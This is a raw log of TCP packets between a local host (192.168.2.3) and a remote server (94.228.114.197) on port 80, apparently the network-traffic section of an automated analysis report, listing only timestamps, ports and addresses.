Jul 22, 2021 11:28:04.529402018 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.529403925 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529444933 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529481888 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529520035 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529534101 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.529557943 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529592991 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529608011 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.529630899 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529659986 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.529669046 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529711008 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.529716969 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529757977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529787064 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.529793978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529835939 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529872894 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529876947 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.529908895 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529947042 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.529993057 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.529997110 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530044079 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530070066 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.530085087 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530122042 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530127048 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.530159950 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530198097 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530199051 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.530232906 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530266047 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.530272961 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530309916 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530355930 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530390978 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.530397892 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530433893 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530471087 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530478001 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.530508995 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530544043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530548096 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.530581951 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530607939 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.530618906 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530653000 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.530667067 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530709028 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530740023 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.530745029 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530782938 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530817032 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.530821085 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530857086 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530894041 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530931950 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.530947924 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.530978918 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531013012 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.531019926 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531058073 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531060934 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.531095982 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531145096 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.531161070 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531198978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531233072 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.531234026 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531271935 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531310081 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531342030 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.531356096 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531398058 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531414032 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.531435013 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531470060 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.531472921 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531510115 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531544924 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.531546116 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531583071 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531615973 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.531620979 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531667948 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531708956 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531728983 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.531744957 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531783104 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531789064 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.531820059 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531856060 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531877041 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.531893015 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531929016 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.531929970 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.531975985 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532016993 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532040119 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.532052994 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532090902 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532129049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532131910 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.532164097 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532190084 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.532201052 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532234907 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.532238960 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532284975 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532320976 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.532325983 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532361984 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532398939 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532399893 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.532437086 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532459974 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.532471895 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532510042 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532546043 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532560110 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.532592058 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532609940 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.532634020 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532672882 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532711029 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532747984 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532749891 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.532783031 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532820940 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532828093 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.532857895 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532875061 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.532905102 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532927036 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.532946110 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532982111 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.532994986 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.533020020 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.533052921 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.533057928 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.533092976 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.533129930 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.533130884 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.533168077 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.533183098 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.533214092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.533255100 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.533260107 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.533291101 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.533329010 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.533344030 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.533365965 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.533401966 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.533406019 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.533438921 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.533462048 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.533474922 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.533515930 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.533520937 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.533562899 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.533598900 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.533679008 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.534693956 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.612786055 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.612832069 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.612869978 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.612919092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.612962961 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613001108 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613034010 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613063097 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.613071918 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613121986 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613146067 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.613166094 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613203049 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613204002 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.613241911 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613269091 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.613280058 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613317013 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613327026 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.613353968 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613392115 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613424063 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.613437891 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613480091 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613502026 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.613516092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613554001 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613559008 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.613591909 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613627911 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613641977 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.613666058 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613703966 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613720894 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.613749981 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613774061 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.613840103 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613878965 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613895893 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.613925934 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613967896 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.613981009 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.614006996 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614044905 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.614047050 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614085913 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614099026 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.614123106 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614161015 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614176035 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.614198923 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614245892 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614259005 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.614288092 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614321947 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.614325047 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614363909 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614391088 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.614403009 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614439964 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614460945 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.614478111 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614516020 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614518881 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.614563942 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614568949 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.614605904 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614644051 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614669085 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.614684105 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614727974 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.614734888 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614773035 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614789009 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.614809990 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614846945 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614864111 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.614893913 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614936113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.614954948 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.614973068 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615010977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615032911 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.615050077 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615087032 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615138054 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.615158081 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615195990 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615210056 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.615231991 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615279913 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615286112 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.615320921 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615356922 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615360975 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.615394115 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615431070 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.615432024 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615467072 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615483999 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.615504026 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615540981 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615560055 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.615586996 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615638018 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615664005 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.615674973 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615715981 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.615720987 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615761995 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615797997 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615811110 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.615834951 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615873098 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615895987 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.615909100 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615942955 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.615947008 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.615983009 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616013050 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.616029024 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616070032 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616091967 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.616106987 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616142035 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.616144896 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616182089 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616218090 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616220951 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.616255045 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616292000 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616307020 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.616338015 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616358995 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.616379976 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616411924 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.616415977 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616453886 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616487026 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.616492033 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616528034 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616565943 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616566896 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.616601944 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616626978 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.616647005 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616684914 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.616689920 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616725922 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616759062 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.616764069 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616801023 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616832018 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.616837025 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616842985 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.616874933 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616910934 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.616913080 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616959095 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.616981983 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.617002010 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.617038012 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.617074966 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.617080927 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.617113113 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.617149115 CEST	80	49720	94.228.114.197	192.168.2.3
Jul 22, 2021 11:28:04.617152929 CEST	49720	80	192.168.2.3	94.228.114.197
Jul 22, 2021 11:28:04.617187023 CEST	80	49720	94.228.114.197	192.168.2.3
